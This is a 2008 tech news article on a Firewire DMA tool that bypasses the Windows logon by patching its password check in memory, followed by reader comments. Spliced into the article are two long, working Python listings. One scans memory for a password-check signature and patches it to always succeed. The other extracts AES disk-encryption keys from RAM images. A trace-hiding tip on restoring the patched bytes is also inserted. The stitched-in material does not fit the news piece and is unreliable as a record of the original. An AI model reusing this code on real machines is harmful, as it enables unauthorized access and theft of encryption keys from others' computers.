
New Zealand hacker releases source code to utility that patches Windows' password check directly in memory

Adam Boileau has released the source code to a utility, written in 2006, that exploits a little-known feature of the Firewire specification to bypass the Windows logon dialog on any PC with a Firewire port.

The tool is a simple 200-line script, written in Python, that uses the direct memory access built into Firewire to read and write the target machine's memory over the port. Windows keeps the code for its password check in a predictable form in memory; the script locates those bytes and overwrites them with a patch that skips the check entirely, so the logon or unlock dialog accepts any password.
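The mechanism described above, as an added example that is not Boileau's script: scan physical memory for the byte pattern of the check, then patch it in place. The Firewire transport is replaced by an in-memory `PhysicalMemory` stand-in (an assumption, so the code runs offline), and `PASSWORD_CHECK_SIG` and `PATCH` are a generic x86 function prologue and a `mov eax,1; ret`, constructed for the example rather than taken from any Windows binary; `PAGE`, `RAM_SIZE`, `SIG_ADDR` and the hole at pages 8-9 are likewise assumed. It also shows two details the paragraph leaves out: DMA reads go out in fixed-size requests, so a pattern that straddles two requests has to be matched across the boundary, and the tool should refuse to patch unless the pattern is found exactly once.

```python
# Added example (not Boileau's script): signature scan and patch over a DMA-style
# interface. The Firewire transport is an in-memory stand-in so this runs offline;
# PASSWORD_CHECK_SIG and PATCH are constructed, not bytes from any Windows binary.

PAGE = 4096  # bytes fetched per DMA request in this example


class MemoryHole(Exception):
    """A physical address that is not RAM (device MMIO, say) and must not be read."""


class PhysicalMemory:
    """Stand-in for the DMA transport: reads and writes by physical address, refusing holes."""

    def __init__(self, contents, holes=()):
        self._ram = bytearray(contents)  # what the target's RAM holds
        self._holes = [(lo, lo + n) for lo, n in holes]

    def _check(self, addr, length):
        if addr < 0 or addr + length > len(self._ram):
            raise MemoryHole("%#x: outside physical memory" % addr)
        for lo, hi in self._holes:
            if addr < hi and addr + length > lo:
                raise MemoryHole("%#x: not RAM" % addr)

    def read(self, addr, length):
        self._check(addr, length)
        return bytes(self._ram[addr:addr + length])

    def write(self, addr, data):
        self._check(addr, len(data))
        self._ram[addr:addr + len(data)] = data


def scan_for_signature(mem, sig, start, end, window=PAGE):
    """Return every address in [start, end) at which `sig` begins.

    Memory is fetched one `window` at a time; the last len(sig)-1 bytes of each
    window are carried into the next so a signature straddling two requests is
    still matched. Ranges that are not RAM are skipped rather than read.
    """
    hits, carry, addr = [], b"", start
    while addr < end:
        n = min(window, end - addr)
        try:
            chunk = mem.read(addr, n)
        except MemoryHole:
            carry = b""  # nothing contiguous survives across a hole
            addr += n
            continue
        buf = carry + chunk
        base = addr - len(carry)
        i = buf.find(sig)
        while i != -1:
            hits.append(base + i)
            i = buf.find(sig, i + 1)
        carry = buf[-(len(sig) - 1):] if len(sig) > 1 else b""
        addr += n
    return hits


def patch_unique(mem, sig, patch, start, end):
    """Find `sig` exactly once and overwrite its first len(patch) bytes.

    Zero or several hits means the signature does not fit this target and a
    blind patch would corrupt unrelated code, so refuse. Returns the address
    and the original bytes so the caller can put them back afterwards.
    """
    hits = scan_for_signature(mem, sig, start, end)
    if len(hits) != 1:
        raise RuntimeError("need exactly one match, found %d" % len(hits))
    saved = mem.read(hits[0], len(patch))
    mem.write(hits[0], patch)
    return hits[0], saved


# Constructed sample, not real Windows memory. Signature: push ebp; mov ebp,esp;
# sub esp,0x10; push ebx; push esi; push edi; mov edi,[ebp+8]  (a generic prologue).
PASSWORD_CHECK_SIG = bytes.fromhex("558bec83ec105356578b7d08")
PATCH = bytes.fromhex("b801000000c3")  # mov eax,1 ; ret  (report "password OK")
RAM_SIZE = 32 * PAGE
SIG_ADDR = 13 * PAGE - 5  # deliberately starts 5 bytes before a window boundary


def build_sample_memory():
    """32 pages of RAM, an MMIO hole at pages 8-9, one copy of the signature."""
    ram = bytearray(b"\x90" * RAM_SIZE)  # NOP filler, cannot match the signature
    ram[SIG_ADDR:SIG_ADDR + len(PASSWORD_CHECK_SIG)] = PASSWORD_CHECK_SIG
    return PhysicalMemory(ram, holes=[(8 * PAGE, 2 * PAGE)])


def demo():
    mem = build_sample_memory()
    addr, saved = patch_unique(mem, PASSWORD_CHECK_SIG, PATCH, 0, RAM_SIZE)
    mem.write(addr, saved)  # restore the original bytes when finished
    return addr
```

`demo()` returns the address that was patched. Ranges that are not RAM are skipped rather than read because a bus request to such a range on a real machine can fail or hang the target; and keeping the saved bytes matters, since a check that is left patched is an obvious artifact for anyone who looks afterwards.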

Boileau says he decided to release the script now, two years after it was initially unveiled, because Microsoft had not acted to patch the vulnerability. Boileau considers his tool a “party-trick demo script that's been lying around my [home folder] for two years gathering dust,” and considers it “a pity to write code and have no one use it.”

“Besides,” says Boileau, “according to Microsoft's definition, it never was a Security Vulnerability anyway – screensavers and login prompts are … about the Feeling of Security.”

Boileau also notes that others have adapted the script to patch Windows Vista's password check, and have used a laptop's PCMCIA slot to add a Firewire card to a machine that had no port; Windows installed the card's driver automatically, after which the attack worked as before.

Firewire's provision for direct memory access (DMA) is useful in other contexts too, such as debugging. A great deal of software checks whether a debugger is attached and refuses to start, or behaves differently, when one is. Inspection over Firewire attaches nothing to the process and does not even go through the operating system; it reads RAM from the other side of the bus, so those checks never see it.

A Firewire port therefore doubles as a high-speed hardware debugger: a second machine on the bus can read any part of the target's memory and change it where needed, whether to patch a password check or to correct the data a buggy program is working on. The same access lets a forensic examiner lift a full-disk-encryption key out of RAM while the machine is running, since the key has to stay in memory for as long as the encrypted volume is mounted.
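One way to do the key recovery mentioned above, as an added example that is not the article's or any forensic tool's code. It goes beyond the sentence in one respect: rather than assuming the key's location is known, it searches a memory image for an AES-128 key schedule, the 176 bytes of round keys that a disk-encryption driver keeps in RAM while the volume is mounted and that must satisfy the FIPS-197 key expansion; a 16-byte value followed by exactly the round keys derived from it is, with overwhelming probability, a live key. The memory image is constructed here (deterministic random filler with one planted schedule, plus a bare copy of the key with no schedule after it, which the search does not report); `PLANT_OFFSET`, the image size and the use of the FIPS-197 test key are assumptions.

```python
"""Find AES-128 keys in a memory image by searching for their key schedule.

Added example, not from the article or any forensic tool. A disk-encryption
driver keeps the 176-byte expanded key in RAM while the volume is mounted;
16 bytes followed by the ten round keys FIPS-197 derives from them are, with
overwhelming probability, a live key. The image built below is constructed.
"""
import random


def _build_sbox():
    """Generate the AES S-box: multiplicative inverse in GF(2^8), then the affine map."""
    sbox = [0] * 256
    p = q = 1  # invariant: p * q == 1 in GF(2^8)
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3
        q ^= (q << 1) & 0xFF                                    # q /= 3
        q ^= (q << 2) & 0xFF
        q ^= (q << 4) & 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)        # affine: xor of rotations
        sbox[p] = (x ^ (x >> 8) ^ 0x63) & 0xFF
        if p == 1:
            break
    sbox[0] = 0x63  # zero has no inverse; defined separately
    return bytes(sbox)


AES_SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176  # 11 round keys of 16 bytes


def _next_word(prev, back4, i):
    """w[i] from w[i-1] (`prev`) and w[i-4] (`back4`), FIPS-197 section 5.2."""
    t = prev
    if i % 4 == 0:
        t = bytes(AES_SBOX[b] for b in t[1:] + t[:1])  # RotWord, then SubWord
        t = bytes([t[0] ^ RCON[i // 4 - 1]]) + t[1:]   # xor Rcon
    return bytes(a ^ b for a, b in zip(back4, t))


def expand_aes128_key(key):
    """Expand a 16-byte key into its 176-byte schedule."""
    w = [key[i:i + 4] for i in range(0, 16, 4)]
    for i in range(4, 44):
        w.append(_next_word(w[i - 1], w[i - 4], i))
    return b"".join(w)


def find_aes128_keys(image):
    """Return [(offset, key)] for every offset whose next 176 bytes form a schedule."""
    found = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        cand = image[off:off + 16]
        # cheap filter: w[4] must match before paying for a full expansion
        if _next_word(cand[12:16], cand[0:4], 4) != image[off + 16:off + 20]:
            continue
        if expand_aes128_key(cand) == image[off:off + SCHEDULE_LEN]:
            found.append((off, cand))
    return found


FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # FIPS-197 Appendix A.1 key
PLANT_OFFSET = 0x5A20  # assumed location of the driver's schedule in the sample image


def build_sample_image(size=32 * 1024):
    """Constructed image: random filler, the FIPS key's full schedule at
    PLANT_OFFSET, and a bare copy of the key at 0x100 with no schedule after
    it (a stale copy on a stack, say), which only a schedule search ignores."""
    rng = random.Random(1394)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[0x100:0x110] = FIPS_KEY
    buf[PLANT_OFFSET:PLANT_OFFSET + SCHEDULE_LEN] = expand_aes128_key(FIPS_KEY)
    return bytes(buf)


if __name__ == "__main__":
    for off, key in find_aes128_keys(build_sample_image()):
        print("AES-128 key at %#x: %s" % (off, key.hex()))
```

The cheap filter matters in practice: a full expansion at every byte offset of a multi-gigabyte image is slow, while checking one derived word first rejects almost every offset at a fraction of the cost. A dump taken over Firewire would be fed to `find_aes128_keys` in place of the constructed image.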

Also important is that the same technique is known to work on other operating systems, including Mac OS X and Linux; some people have even used modified iPods to run Firewire DMA attacks on the spot.

Received security wisdom holds that a computer in an adversary's hands is already lost: with physical access and enough time, its protections will be subverted. For a machine with a Firewire port the point could not be more true, and the time needed is a cable and a few seconds. It also applies to a machine that is merely locked or asleep, since the password prompt protects nothing that is sitting in RAM. The practical defences are to keep the port from being used at all, by disabling the Firewire driver or physically blocking the port, and to shut an encrypted laptop down rather than lock it, so that the disk key is no longer in memory while the machine is out of your sight.

Comments

Not a problem...
By Bonrock on 3/7/2008 10:47:36 PM , Rating: -1
On first glance, I thought this was a major vulnerability. Then I remembered that most computers don't have FireWire ports, because nobody uses that crap.

RE: Not a problem...
By napalmjack on 3/7/2008 11:13:21 PM , Rating: 2
Sure about that?

RE: Not a problem...
By ProviaFan on 3/7/2008 11:22:16 PM , Rating: 4
Anyone who works with digital audio or video knows that you are clueless.

RE: Not a problem...
By lexluthermiester on 3/14/2008 3:11:11 PM , Rating: 2
I don't use firewire and never will, and I work with audio and video all the time. USB can be found on every machine sold today, whereas firewire is not so widespread.

RE: Not a problem...
By omnicronx on 3/7/2008 11:29:18 PM , Rating: 2
Many laptops include firewire. I think every Mac includes one.

RE: Not a problem...
By Master Kenobi on 3/8/2008 12:01:07 AM , Rating: 2
All Macs, Sonys, and many HP/Dell systems include a 4-pin firewire, with desktop models possibly including a 6-pin port.

RE: Not a problem...
By JoshuaBuss on 3/8/2008 1:39:58 AM , Rating: 2
not the macbook air.. hehe

RE: Not a problem...
By omnicronx on 3/8/2008 1:19:46 PM , Rating: 2
Exactly, and this is why it should be a big concern. Looking at many workplaces, most people in high positions have laptops. Think about the sensitive information that could be pulled without needing hardcore equipment.

RE: Not a problem...
By Ochophosphate on 3/8/2008 9:12:36 AM , Rating: 2
as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

Even without an available firewire port, looks like they can just add their own. Sounding like more of a problem yet?

RE: Not a problem...
By Melted Rabbit on 3/8/2008 1:39:54 PM , Rating: 2
This is less a flaw on the part of Apple and Firewire than a design flaw in the PCI standard, which Intel designed. There is no way to fix this flaw with PCI easily, as the PCI standard has no kind of security system. By default, all PCI peripherals can have read/write access to the entire memory space of the computer. This exploit would be possible, but harder to do, with flash and an FPGA on a PCI card, and with no Firewire involved. Also, systems with just PCI and those with PCI and PCI Express are both vulnerable to this exploit.

One workaround for Firewire is to let the Firewire bus access a smaller virtual address space instead of the entire actual address space of the computer. Then this particular attack could be avoided. The PowerMac G5 and Sun workstations fix the flaw in this way. I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work. Intel would like to see Firewire dead, so don't expect this fix on an Intel chipset or processor, ever. AMD probably doesn't have the engineers to add a fix like this to their offerings.

The best solution for this problem with PCI is to come up with a new bus standard, not software compatible with PCIe, that has a security model. It should also address some of the intentional shortcomings of PCIe, like being a peer-to-peer bus instead of the master-slave setup currently present in PCIe. It should also add the ability to route between nodes, which PCIe also cannot do. Intel intentionally left the last two mentioned features out to make a general purpose PC the only feasible option for computing instead of smaller, specialized computers being an option for a user.

RE: Not a problem...
By DragonMaster0 on 3/9/2008 8:29:09 PM , Rating: 2
I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work.

I don't know any north bridges with on-chip firewire (maybe they do now, but I doubt it). Firewire is connected to a separate controller (usually a VIA or TI) on the PCI bus, just like a network chip. These would need to block the RAM area in question.

Intel would like to see Firewire dead

Obviously, since it doesn't load the CPU...


Copyright 2016 DailyTech LLC.